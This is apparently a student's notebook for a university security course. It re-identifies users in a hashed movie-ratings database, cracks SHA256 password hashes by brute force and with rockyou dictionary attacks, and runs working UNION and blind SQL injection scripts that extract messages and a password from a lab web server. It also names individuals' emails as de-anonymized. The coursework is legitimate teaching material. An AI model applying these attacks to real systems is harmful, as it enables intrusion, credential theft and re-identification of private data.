# Exercise 1: Find out about your favorite movies

In this exercise you have to
de-anonymize the dedis-database that holds your secret movie-ratings.

The database is
given to you as a csv-file with the following format:

`sha256(salt | email), sha256(salt | movie), date, rating`

The salt is the same for the whole database. There are 189 emails that correspond to the
students and teachers of COM-402. Your goal is to find out what movies you rated in the
dedis-database.

To de-anonymize the list, you get a second csv-file from IMDb in the format below. This
second list is smaller than the first list.
`email, movie, date, rating`

For all sub-exercises, the entries in the IMDb are a strict subset of the entries in the
dedis-database.

The exercise has 3 sets of csv-files (`dedis-db` and `IMDb-db`), with increasing difficulty to
recover the movies you rated:

### 1 Dates are giving it away - each user rated the movie at the same date in both `dedis-db` and `IMDb-db`.

_**Hint**: some dates might have more than one rating, so you need to make sure you remove these doubles._

In [None]:
import pandas as pd

# Column names for the header-less CSV exports, one list per database family.
col_names = {
    "imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"],
}

lu_email = "lucia.monterosanchis@epfl.ch"

# Read all three difficulty levels of both databases into `data`,
# keyed "<family>-<level>" (e.g. "dedis-1").
data = {}
for i in (1, 2, 3):
    for ds in ("dedis", "imdb"):
        name = "{}-{}".format(ds, i)
        csv_path = "Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name)
        data[name] = pd.read_csv(csv_path, names=col_names[ds],
            skipinitialspace=True, quotechar='"')

# This part of the exercise works on copies of the level-1 frames.
data_i = data["imdb-1"].copy()
data_d = data["dedis-1"].copy()
movies = {}  # salted movie hash -> plain movie title
emails = {}  # plain email -> salted email hash

# 1. Group imdb data by email
grouped_i = data_i.groupby("email")

# 2. Group dedis data by salted email
grouped_d = data_d.groupby("salted-email")

# The date set of an IMDb user does not depend on the dedis user it is
# compared with, so build every set once instead of once per dedis user.
imdb_users = [(email, frame_i, set(frame_i["date"])) for email, frame_i in grouped_i]

# 3. Compare every salted dedis user with every plain IMDb user
seen_emails = []  # every matched plain email, kept to detect ambiguous matches
for salted_email, frame_d in grouped_d:
    dates_d = set(frame_d["date"])
    for email, frame_i, dates_i in imdb_users:
        # 3.1 an IMDb user whose rating dates all occur among the dedis
        # user's dates is taken to be the same person
        if not dates_i.issubset(dates_d):
            continue
        seen_emails.append(email)
        # 3.2 remember which hash belongs to which email
        emails[email] = salted_email
        # 3.3 join on date to line up salted movie hashes with plain titles
        # NOTE(review): a date carrying several ratings pairs every hash of
        # that date with every title of that date; the exercise hint asks for
        # such doubles to be removed - confirm whether that matters here.
        combined_df = frame_d.join(frame_i.set_index(frame_i["date"]),
            on="date", how="inner", lsuffix='_left', rsuffix='_right')
        # 3.4 record the hash -> title pairs found for this user
        movies.update(zip(combined_df["salted-movie"], combined_df["movie"]))

# just in case: the same plain email matched more than one dedis user
if len(seen_emails) != len(set(seen_emails)):
    print("There were duplicates!!!")

# 4. Save file with my movie ratings
# The context manager closes the file even if one of the lookups below raises.
with open('Lucia_MonteroSanchis_259236/solutions/1a.txt', 'w') as f:
    # One plain movie title per line, in the order of my dedis ratings.
    for m in grouped_d.get_group(emails[lu_email])["salted-movie"]:
        f.write(movies[m])
        f.write('\n')

### 2 The dates are random, reflecting the fact that you won’t rate a movie the same day with Netflix and the IMDb. However, a simple frequency-attack on the movies is enough to map the movies to the hashes, then you’ll have to fit the IMDb with the dedis-database.

_**Hint**: Once you have mapped the movie hashes to the plain movie names, search for any user who rated all the films you find in their public ratings._

In [None]:
import pandas as pd

# Column names for the header-less CSV exports, one list per database family.
col_names = {
    "imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"],
}

lu_email = "lucia.monterosanchis@epfl.ch"

# Read all three difficulty levels of both databases into `data`,
# keyed "<family>-<level>" (e.g. "dedis-2").
data = {}
for i in (1, 2, 3):
    for ds in ("dedis", "imdb"):
        name = "{}-{}".format(ds, i)
        csv_path = "Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name)
        data[name] = pd.read_csv(csv_path, names=col_names[ds],
            skipinitialspace=True, quotechar='"')

# This part of the exercise works on copies of the level-2 frames.
data_i = data["imdb-2"].copy()
data_d = data["dedis-2"].copy()

def update(dictionary, k, v):
    """Append v to the list stored under key k, creating the list if needed.

    The dictionary is modified in place and nothing is returned: an
    existing key gets v appended to its list, a new key is bound to the
    singleton list [v].
    """
    dictionary.setdefault(k, []).append(v)

# 1. Group imdb data by email and by movie
grouped_u_i, grouped_m_i = data_i.groupby("email"), data_i.groupby("movie")

# 2. Group dedis data by salted email and by salted movie
grouped_u_d, grouped_m_d = data_d.groupby("salted-email"), data_d.groupby("salted-movie")

# 3. Number of ratings per movie, as {movie: count} dictionaries
count_m_i = grouped_m_i['email'].count().to_dict()
count_m_d = grouped_m_d['salted-email'].count().to_dict()

# 4. Order both sides by rating count and pair them rank by rank
# NOTE(review): movies with equal counts keep their dictionary order, so ties
# are paired arbitrarily - confirm the counts are distinct in this data set.
import operator
by_count = operator.itemgetter(1)
sorted_i = sorted(count_m_i.items(), key=by_count)
sorted_d = sorted(count_m_d.items(), key=by_count)

# salted movie hash -> plain movie title
movies = {}
for (plain_title, _), (salted_title, _) in zip(sorted_i, sorted_d):
    movies[salted_title] = plain_title

# 5. Compare every salted dedis user with every plain IMDb user
# emails maps a plain email to the list of salted emails that could be it.
emails = {}

# The movie set of an IMDb user is the same for every dedis user it is
# compared with, so build each set once up front.
imdb_movie_sets = [(email, set(frame_i["movie"])) for email, frame_i in grouped_u_i]

for salted_email, frame_d in grouped_u_d:
    # Translate this user's hashes to titles; hashes without a mapping are
    # skipped instead of raising KeyError.
    movies_d_unsalted = {movies[m] for m in frame_d["salted-movie"] if m in movies}
    for email, movies_i in imdb_movie_sets:
        # 5.1 every public IMDb rating must also appear in the dedis ratings
        if movies_i.issubset(movies_d_unsalted):
            # 5.2 record the salted email as a candidate for this email
            update(emails, email, salted_email)

# 6. Save file with my movie ratings
# The context manager closes the file even if one of the lookups below raises.
with open('Lucia_MonteroSanchis_259236/solutions/1b.txt', 'w') as f:
    # Only the first candidate hash recorded for my email is used.
    for m in grouped_u_d.get_group(emails[lu_email][0])["salted-movie"]:
        f.write(movies[m])
        f.write('\n')

### 3 More realistic database
The rating dates in the dedis-database and in IMDb are not the
same, but similar: they lie within 14 days of each other, following a triangular distribution
generated with Python’s `random.choices` and weights of [1, 2, 3, …, 14, 13, 12, …, 1].

_**Hint**: First search for user-name hash/plaintext overlap and fit those to find the hash
of your email. Then you can search for the closest overlap of the public ratings and
the anonymous ratings of your email._

In [1]:
import pandas as pd

# Column names for the header-less CSV exports, one list per database family.
col_names = {
    "imdb": ["email", "movie", "date", "rating"],
    "dedis": ["salted-email", "salted-movie", "date", "rating"],
}

lu_email = "lucia.monterosanchis@epfl.ch"

# Read all three difficulty levels of both databases into `data`,
# keyed "<family>-<level>" (e.g. "dedis-3").
data = {}
for i in (1, 2, 3):
    for ds in ("dedis", "imdb"):
        name = "{}-{}".format(ds, i)
        csv_path = "Lucia_MonteroSanchis_259236/hw3_ex1_{}/{}.csv".format(lu_email, name)
        data[name] = pd.read_csv(csv_path, names=col_names[ds],
            skipinitialspace=True, quotechar='"')

# This part of the exercise works on copies of the level-3 frames.
data_i = data["imdb-3"].copy()
data_d = data["dedis-3"].copy()

def update(dictionary, k, v):
    """Record value v under key k in a dictionary of lists.

    A key seen for the first time is bound to an empty list before v is
    appended, so every key always maps to the list of all values added
    for it. The dictionary is changed in place; nothing is returned.
    """
    if k not in dictionary:
        dictionary[k] = []
    dictionary[k].append(v)

# 1. Group imdb data by email and by movie
grouped_u_i, grouped_m_i = (data_i.groupby(column) for column in ("email", "movie"))

# 2. Group dedis data by salted email and by salted movie
grouped_u_d, grouped_m_d = (data_d.groupby(column)
    for column in ("salted-email", "salted-movie"))

# 3.1 Define function for next step
def check_dates(dates_i, dates_d):
    """Tell whether every date in dates_i has a close partner in dates_d.

    Returns True when find_close_date succeeds for each element of
    dates_i (including when dates_i is empty), and False as soon as one
    element has no close date in dates_d.
    """
    return all(find_close_date(d_i, dates_d) for d_i in dates_i)
    
def make_date(d, separator="/"):
    """Build a datetime.date from a 'day<sep>month<two-digit year>' string.

    The string is split on `separator`; the first three fields are read as
    day, month and year, and '20' is prefixed to the year field.
    """
    from datetime import date
    fields = d.split(separator)
    day, month, short_year = fields[0], fields[1], fields[2]
    return date(year=int('20' + short_year), month=int(month), day=int(day))

def find_close_date(d_i, dates_d, close=14):
    """Return True if some date in dates_d is at most `close` days from d_i.

    d_i and the elements of dates_d are date strings understood by
    make_date. The distance is compared in absolute value, so dates
    before and after d_i both count. Returns False when nothing in
    dates_d is close enough (or dates_d is empty).
    """
    target = make_date(d_i)
    return any(abs((target - make_date(d_d)).days) <= close for d_d in dates_d)

# 3.2 For every plain movie, look for the first salted movie whose rating
# dates lie close to all of the plain movie's rating dates
movies = {}          # salted movie hash -> plain movie title
missing_movies = []  # plain titles for which no salted movie qualified
for plain_title, ratings_i in grouped_m_i:
    dates_i = ratings_i["date"]
    # The generator stops at the first salted movie that passes check_dates.
    first_match = next(
        (salted_title for salted_title, ratings_d in grouped_m_d
            if check_dates(dates_i, ratings_d["date"])),
        None)
    if first_match is None:
        missing_movies.append(plain_title)
    else:
        movies[first_match] = plain_title

# 3.3 Salted movies that did not end up in the mapping
missing_salted_movies = [salted_title for salted_title, _ in grouped_m_d
    if salted_title not in movies]

# 4 Get the missing movies
# 4.1 Map salted users to plain users: a pair matches when every public
# IMDb movie of the plain user is among the translated dedis movies
movies_d_unsalted = []
u_movies = {}  # salted email -> that user's salted movies without a mapping
emails = {}    # salted email -> plain email
for plain_email, ratings_i in grouped_u_i:
    movies_i = set(ratings_i["movie"])
    for salted_email, ratings_d in grouped_u_d:
        movies_d = list(ratings_d["salted-movie"])
        movies_d_unsalted = [movies[h] for h in movies_d if h in movies]
        if not movies_i.issubset(movies_d_unsalted):
            continue
        emails[salted_email] = plain_email
        # Some of this user's hashes could not be translated: remember them.
        if len(movies_d_unsalted) != len(movies_d):
            u_movies[salted_email] = {h for h in movies_d if h not in movies}

# 4.2 try with the users we mapped: print a smiley for every combination of
# (missing title, missing hash, mapped user) where the user rated both
for h_e, e in emails.items():
    rated_hashes = list(grouped_u_d.get_group(h_e)["salted-movie"])
    rated_titles = list(grouped_u_i.get_group(e)["movie"])
    for m in missing_movies:
        for h_m in missing_salted_movies:
            if h_m in rated_hashes and m in rated_titles:
                print(":)")
                    
# 4.3 The previous didn't work! need to map some more users...
# Start from the users (plain and hashed) that are not mapped yet.
users_list = [plain_email for plain_email, _ in grouped_u_i
    if plain_email not in emails.values()]
h_users_list = [salted_email for salted_email, _ in grouped_u_d
    if salted_email not in emails]


def _rated_plain(user, title):
    """True if the plain IMDb user has a rating for the given plain title."""
    return title in list(grouped_u_i.get_group(user)["movie"])


def _rated_salted(h_user, h_title):
    """True if the hashed dedis user has a rating for the given hashed title."""
    return h_title in list(grouped_u_d.get_group(h_user)["salted-movie"])


# 4.3.1 I'll keep only the ones who voted some missing movie
users_list_ = [u for u in users_list if _rated_plain(u, missing_movies[0])]

# 4.3.2 and I remove the ones who also voted the other missing movie
users_list = [u for u in users_list_ if not _rated_plain(u, missing_movies[1])]

# 4.3.3 and I do the same with the dedis data, once per missing hash:
# h_users_list_0 rated only missing hash 0, h_users_list_1 only missing hash 1
h_users_list_ = [u for u in h_users_list
    if _rated_salted(u, missing_salted_movies[0])]
h_users_list_0 = [u for u in h_users_list_
    if not _rated_salted(u, missing_salted_movies[1])]

h_users_list_ = [u for u in h_users_list
    if _rated_salted(u, missing_salted_movies[1])]
h_users_list_1 = [u for u in h_users_list_
    if not _rated_salted(u, missing_salted_movies[0])]

# 4.3.4 / 4.3.5 Try to map the first user of h_users_list_0, and then the
# first user of h_users_list_1, to someone in users_list
def _overlap_scores(h_ratings, plain_users, plain_groups, title_to_hash):
    """Score plain users by how well their ratings fit one hashed user.

    h_ratings     -- ratings frame of the hashed user (has "salted-movie")
    plain_users   -- plain emails to score
    plain_groups  -- IMDb ratings grouped by email
    title_to_hash -- plain title -> salted hash for the movies mapped so far

    Returns {plain email: fraction}, where the fraction is the share of the
    plain user's already-mapped movies that the hashed user rated as well.
    """
    h_titles = set(h_ratings["salted-movie"])
    scores = {}
    for user in plain_users:
        known = [title_to_hash[m] for m in plain_groups.get_group(user)["movie"]
            if m in title_to_hash]
        hits = sum(1 for h in known if h in h_titles)
        # A user without any already-mapped movie scores 0.0 instead of
        # triggering a ZeroDivisionError.
        scores[user] = hits / len(known) if known else 0.0
    return scores


# plain movie title -> salted movie hash
inv_movies = {v: k for k, v in movies.items()}

import operator

h_candidate = h_users_list_0[0]
h_movies_cand = grouped_u_d.get_group(h_candidate)
c_dates_0 = _overlap_scores(h_movies_cand, users_list, grouped_u_i, inv_movies)

# I keep the best mapping for h_users_list_0
max_arg_0 = max(c_dates_0.items(), key=operator.itemgetter(1))[0]
print("{}: {}".format(max_arg_0, c_dates_0[max_arg_0]))

h_candidate = h_users_list_1[0]
h_movies_cand = grouped_u_d.get_group(h_candidate)
c_dates_1 = _overlap_scores(h_movies_cand, users_list, grouped_u_i, inv_movies)

# I keep the best mapping for h_users_list_1
max_arg_1 = max(c_dates_1.items(), key=operator.itemgetter(1))[0]
print("{}: {}".format(max_arg_1, c_dates_1[max_arg_1]))

# 4.3.6 I compare the results for the two best mappings I got before.
# The hashed user must be chosen together with the plain user: the score in
# c_dates_0 was computed against h_users_list_0[0] and the one in c_dates_1
# against h_users_list_1[0], so pairing the winner with the other hash would
# mix up two different people.
if c_dates_0[max_arg_0] > c_dates_1[max_arg_1]:
    candidate = max_arg_0
    h_candidate = h_users_list_0[0]
else:
    candidate = max_arg_1
    h_candidate = h_users_list_1[0]

# I was able to match Jeremy.Corcoba@unil.ch!

# 4.4 Now I use his ratings to find the missing matches and
# add the found movie to 'movies': his first hash without a mapping is
# paired with his first title without a mapping
h_unmapped = [hm for hm in grouped_u_d.get_group(h_candidate)["salted-movie"]
    if hm not in movies]
unmapped = [m for m in grouped_u_i.get_group(candidate)["movie"]
    if m not in inv_movies]
movies[h_unmapped[0]] = unmapped[0]

# The remaining missing hash is paired with the remaining missing title.
h_remaining = [hm for hm in missing_salted_movies if hm not in movies]
remaining = [m for m in missing_movies if m not in movies.values()]
movies[h_remaining[0]] = remaining[0]

# 5 Find my movies: look for the dedis user(s) whose translated ratings
# contain all of my public IMDb ratings; the last such user wins
movies_d_unsalted = []
movies_i = set(grouped_u_i.get_group(lu_email)["movie"])
lu_movies_salted = []
lu_movies = []
for _, ratings_d in grouped_u_d:
    movies_d = ratings_d["salted-movie"]
    movies_d_unsalted = {movies[h] for h in movies_d if h in movies}
    if not movies_i.issubset(movies_d_unsalted):
        continue
    lu_movies, lu_movies_salted = movies_d_unsalted, movies_d
    # Report how many of the salted ratings have no distinct plain title.
    n_missing = len(lu_movies_salted) - len(lu_movies)
    if n_missing != 0:
        print("{} movie(s) missing!".format(n_missing))
            
# 6 Save file with my movie ratings
# The context manager closes the file even if a write fails.
with open('Lucia_MonteroSanchis_259236/solutions/1c.txt', 'w') as f:
    # One plain movie title per line.
    for m in lu_movies:
        f.write(m)
        f.write('\n')

aurelien.monbaron@epfl.ch: 0.42857142857142855
Jeremy.Corcoba@unil.ch: 1.0


# Exercise 2: L33t hax0r5

In the txt file you will find 10 password hashes for each part of
the exercise. Your goal is to crack those hashes and reveal the passwords.

### 1 Brute force
In this part you should implement a brute-force attack. Passwords are randomly generated
from the set of lowercase letters and digits (‘abcd...xyz0123...9’) and have length 4, 5, or 6
characters. Generated passwords are then hashed with SHA256 and corresponding
hexdigests are sent to you in the file.

In [None]:
# Read file, removing whitespace characters around each line
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = [x.strip() for x in f]

# Get strings for this exercise
ex2a = content[1:11]

import string

# Generate set of possible characters
chars = string.digits + string.ascii_lowercase

import itertools
import hashlib

# Dictionary to store the found passwords (hexdigest -> password)
found_pwd = {}

# Hashes still to crack. A set gives constant-time membership tests in the
# hot loop, and the search stops when it runs empty instead of relying on a
# hard-coded count of ten.
remaining = set(ex2a)

# Check all possible combinations of characters of length 4, 5 and 6
for length in range(4, 7):
    if not remaining:
        break
    for combo in itertools.product(chars, repeat=length):
        w = ''.join(combo)
        # get hash
        hashed_w = hashlib.sha256(w.encode('utf-8')).hexdigest()
        # compare
        if hashed_w in remaining:
            found_pwd[hashed_w] = w
            print(w)
            remaining.discard(hashed_w)
            if not remaining:
                break

# Save file with the found passwords
# Build the line first, so a hash that was not cracked raises KeyError
# before the output file is opened (and truncated).
passwords_line = ', '.join(found_pwd[k] for k in ex2a)
with open('Lucia_MonteroSanchis_259236/solutions/2a.txt', 'w') as f:
    f.write(passwords_line)

### 2 Dictionary attack with rules
In this part you should
implement a dictionary attack. We generate a password by selecting a word from a
large dictionary and then randomly applying some of the common user modifications:
- capitalize the first letter and every letter which comes after a digit. For example, `com402dedis` becomes `Com402Dedis`. This is achieved by `title()`, e.g. `'com402dedis'.title()`
- change `e` to `3`
- change `o` to `0`
- change `i` to `1`

In the file you received you will find the SHA256 hexdigests of passwords generated in this
way. Your task is to crack them using a dictionary attack.
Dictionaries can be found online (e.g. https://wiki.skullsecurity.org/Passwords).

_**Note 1**: the words we used to generate passwords only contain uppercase and lowercase letters and digits._

_**Note 2**: Not all dictionaries are the same, be aware that if you implement the attack correctly
but you can't crack the passwords, then you might be using a dictionary which doesn't
contain all the words as the dictionary we used._

In [None]:
# 1. Read file, trimming surrounding whitespace (such as the trailing `\n`)
# from every line
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = list(map(str.strip, f))

# 2. Get strings for this exercise
ex2b = content[12:22]

import string

# 3. Generate set of possible characters: digits, then lowercase, then
# uppercase ASCII letters
chars = string.digits + string.ascii_letters

# 4. Define rules
def change(string, nb):
    """Apply one of the four password-mangling rules to a string.

    nb == 0 returns string.title(); nb == 1 replaces every e/E by 3;
    nb == 2 replaces every o/O by 0; any other nb replaces every i/I by 1.
    """
    if nb == 0:
        return string.title()
    # The three remaining rules only differ in the letter and its digit.
    if nb == 1:
        lower, upper, digit = "e", "E", "3"
    elif nb == 2:
        lower, upper, digit = "o", "O", "0"
    else:
        lower, upper, digit = "i", "I", "1"
    return string.replace(lower, digit).replace(upper, digit)

# Dictionary to store found passwords (hexdigest -> password)
found_pwd = {}

# 5. Load dictionary, keeping only words made of the allowed characters
import bz2

allowed_chars = set(chars)
dictionary = set()
with bz2.open("rockyou.txt.bz2", "rt", encoding="ISO-8859-1") as bz_file:
    for line in bz_file:
        word = line.rstrip()
        if allowed_chars.issuperset(word):
            dictionary.add(word)

# 6. Iterate through the dictionary, applying all possible modifications
import hashlib


def _variants(word):
    """Return every distinct string obtained by applying any subset of the
    four rules of change() to word, always in the order 0, 1, 2, 3."""
    results = {word}
    for rule in range(4):
        # each rule is either skipped (keep the old strings) or applied
        results |= {change(candidate, rule) for candidate in results}
    return results


# Hashes still to crack; the search stops as soon as this set is empty,
# which replaces the hard-coded count of ten and the cascade of breaks.
remaining = set(ex2b)

for w in dictionary:
    if not remaining:
        break
    # Rules that leave the word unchanged yield duplicates; the set returned
    # by _variants hashes (and prints) every distinct candidate only once.
    for w_3 in _variants(w):
        h_w = hashlib.sha256(w_3.encode('utf-8')).hexdigest()
        if h_w in remaining:
            found_pwd[h_w] = w_3
            print(w_3)
            remaining.discard(h_w)

# 7. Save file with the found passwords
# Build the line first, so a hash that was not cracked raises KeyError
# before the output file is opened (and truncated).
passwords_line = ', '.join(found_pwd[k] for k in ex2b)
with open('Lucia_MonteroSanchis_259236/solutions/2b.txt', 'w') as f:
    f.write(passwords_line)

### 3 Dictionary attack with salt
Once you have a dictionary you can compute the hashes of all those words in it, and
create a lookup table. This way, each next password you want to crack is nothing more than
a query in the lookup table. Because of this, passwords are usually ‘salted’ before hashing.

In this part of the exercise you should implement another attack using a dictionary. We
generate a password by simply selecting a random word from a dictionary and appending a
random salt to it. The password is then hashed with SHA256 and hexdigest and salt are sent
to you in the file. Your task is to crack the passwords using a dictionary.

_**Note**: Salt is exactly two characters long and it contains only hexadecimal characters._

In [1]:
# 1. Read file, removing whitespace characters like `\n` around each line
with open("Lucia_MonteroSanchis_259236/hw3_ex2.txt") as f:
    content = [x.strip() for x in f]

# 2. Get data for this exercise: every line is "<salt>, <hexdigest>"
# Each line is split once, and blank lines (for instance a trailing empty
# line) are skipped instead of raising IndexError.
ex2c_s = []  # salts
ex2c_p = []  # salted password hashes, in the same order as the salts
for c in content[23:]:
    if not c:
        continue
    salt, hashed = c.split(", ")[:2]
    ex2c_s.append(salt)
    ex2c_p.append(hashed)

import string

# 3. Generate set of possible characters
chars = string.digits + string.ascii_lowercase + string.ascii_uppercase

# 4. Load dictionary, keeping only words made of the allowed characters
import bz2

allowed_chars = set(chars)
dictionary = set()
with bz2.open("rockyou.txt.bz2", "rt", encoding="ISO-8859-1") as bz_file:
    for line in bz_file:
        word = line.rstrip()
        if allowed_chars.issuperset(word):
            dictionary.add(word)

# Dictionary to store found passwords (hexdigest -> plain word)
found_pwd = {}

# 6. Iterate through the dictionary
# append each salt, then hash and compare to the pwd that came with that salt
import hashlib

# hexdigest -> salt for the entries still to crack. Every salt is only
# tested against its own hash, cracked entries are not hashed again, and the
# search ends when nothing is left instead of at a hard-coded count of ten.
pending = dict(zip(ex2c_p, ex2c_s))

for w in dictionary:
    if not pending:
        break
    # iterate over a snapshot because cracked entries are removed on the fly
    for h_target, s in list(pending.items()):
        w_s = w + s
        h_w = hashlib.sha256(w_s.encode('utf-8')).hexdigest()
        if h_w == h_target:
            found_pwd[h_w] = w
            print(w)
            del pending[h_target]

# 7. Save file with the found passwords
# Build the line first, so a hash that was not cracked raises KeyError
# before the output file is opened (and truncated).
passwords_line = ', '.join(found_pwd[k] for k in ex2c_p)
with open('Lucia_MonteroSanchis_259236/solutions/2c.txt', 'w') as f:
    f.write(passwords_line)

# 3

In [1]:
import base64
# Base64-encoded hint text; decode it to bytes, then to text, and print it.
x = "V2VsbCwgdGhhdCBzaXRlIHNtZWxscyBsaWtlIHNvbWUgU1FMIGluamVjdGlvbnMgYXJlIHBvc3NpYmxlIExvb2sgYXQgYC9yb290L3N0YXJ0dXAuc2hgIHRvIHNlZSBob3cgdGhlIFNRTCBzY2hlbWEgbG9va3MgbGlrZSE="
hint_bytes = base64.b64decode(x)
hint_text = hint_bytes.decode()
print(hint_text)

Well, that site smells like some SQL injections are possible Look at `/root/startup.sh` to see how the SQL schema looks like!


You should try requesting both valid and invalid SQL queries and check their output.

### 3a

In [2]:
# Hint given as space-separated decimal byte values of a UTF-8 string.
x = "089 111 117 032 100 111 110 226 128 153 116 032 097 108 119 097 121 115 032 110 101 101 100 032 097 032 102 111 114 109 032 102 111 114 032 083 081 076 032 105 110 106 101 099 116 105 111 110 115 032 059 041"
# Turn the decimal values into one hex string (two digits per byte) ...
x = bytes(int(code) for code in x.split(" ")).hex()
# ... and decode the bytes it describes.
print(bytes.fromhex(x).decode())

You don’t always need a form for SQL injections ;)


In [1]:
from bs4 import BeautifulSoup
import json
import requests

# The id parameter carries a UNION query that reads mail and message from
# contact_messages for james@bond.mi5. The closing quote is left out of the
# payload - presumably the server-side query supplies it.
url = ("http://172.17.0.2/personalities?id="
    "1' union all select mail, message from contact_messages where mail='james@bond.mi5")

response = requests.get(url)

# Parse the returned page and collect its links.
soup = BeautifulSoup(response.content, 'html.parser')
x = soup.body.find_all('a')

# Print what follows the first ':' in the text of the second link.
second_link_text = x[1].contents[0]
print(second_link_text.split(':')[1])


mahoney verde athena pershing hegelian lucas schlegel lazarus chopin orpheus


### 3b

You should try requesting both valid and invalid SQL queries and check their output.

In [1]:
from bs4 import BeautifulSoup
import json
import requests

# Endpoint that receives the form, and the header announcing a URL-encoded
# form body.
url = "http://172.17.0.2/messages"
headers = {'Content-Type': "application/x-www-form-urlencoded"}

def analyze_response(response):
    """Classify the server's answer to one injected query.

    Returns 0 when str(response) contains '200' and the page body contains
    "The name exists !", 1 when it contains '200' without that text, and 2
    otherwise (in which case the parsed page is pretty-printed).
    """
    soup = BeautifulSoup(response.content, 'html.parser')
    if '200' not in str(response):
        print(soup.prettify())
        return 2
    return 0 if "The name exists !" in str(soup.body) else 1

# get password length: try 0, 1, 2, ... until the server confirms one
# (analyze_response returns 0 when the injected condition holds)
for length in range(100):
    payload = "name=0' union all select password, password from users where CHAR_LENGTH(password)={} and name='inspector_derrick".format(length)
    response = requests.post(url, data=payload, headers=headers)
    result = analyze_response(response)
    if not result:
        break

import string

# Generate set of some characters
chars = string.digits + string.ascii_lowercase + string.ascii_uppercase

# get the characters that occur anywhere in the password
pwd_chars = []

for c in chars:
    payload = "name=0' union all select password, password from users where password like '%{}%' and name='inspector_derrick".format(c)
    response = requests.post(url, data=payload, headers=headers)
    result = analyze_response(response)
    if not result:
        pwd_chars.append(c)

# rebuild the password one position at a time by extending a known prefix
ordered_char = []
for i in range(length):
    for c in pwd_chars:
        payload = "name=0' union all select password, password from users where password like '{}{}%' and name='inspector_derrick".format(''.join(ordered_char), c)
        response = requests.post(url, data=payload, headers=headers)
        result = analyze_response(response)
        if not result:
            ordered_char.append(c)
            # this position is settled; start the next one from the first
            # candidate character again
            break
    else:
        # no candidate extends the prefix, so further requests are pointless
        break
print(''.join(ordered_char))

868c39d2ef916de
